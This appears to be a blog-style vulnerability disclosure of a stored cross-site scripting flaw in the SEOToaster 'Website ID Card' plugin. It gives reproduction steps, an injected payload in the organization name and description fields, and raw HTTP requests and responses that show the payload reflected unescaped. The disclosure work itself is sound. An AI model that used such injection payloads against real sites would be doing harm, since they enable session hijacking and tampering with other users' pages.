Description
- It was noted that the application was vulnerable to Cross-Site Scripting (XSS) in the "Edit General Info"
Stored XSS "Edit General Info"#1
Steps to Reproduce
- Login with admin and visit "Website ID Card" > "Website Id Card"
- In the "Organization Name" add the following payload "><img src=x onerror=alert(1)>
// HTTP POST Request
POST /seotoaster/plugin/widcard/run/setWebsiteIdCard HTTP/1.1
Host: 192.168.58.149
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0
[...]
------geckoformboundarye25c980b11fd10ddbadfbd1b54af4d87
Content-Disposition: form-data; name="organization_name"
"><img src=x onerror=alert(`xss1`)>
------geckoformboundarye25c980b11fd10ddbadfbd1b54af4d87
Content-Disposition: form-data; name="organization_description"
"><img src=x onerror=alert(`xss2`)>
------geckoformboundarye25c980b11fd10ddbadfbd1b54af4d87
[...]
// HTTP Response
HTTP/1.1 302 Found
Date: Sun, 20 Jul 2025 15:35:07 GMT
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3
[...]
// HTTP GET Request
GET /seotoaster/plugin/widcard/run/getWebsiteIdCard HTTP/1.1
Host: 192.168.58.149
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0
[...]
// HTTP Response
HTTP/1.1 200 OK
Date: Sun, 20 Jul 2025 15:35:11 GMT
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3
[...]
[...]
<input type="text" name="organization_name" value=""><img src=x onerror=alert(`xss1`)>" />
[...]
No comments:
Post a Comment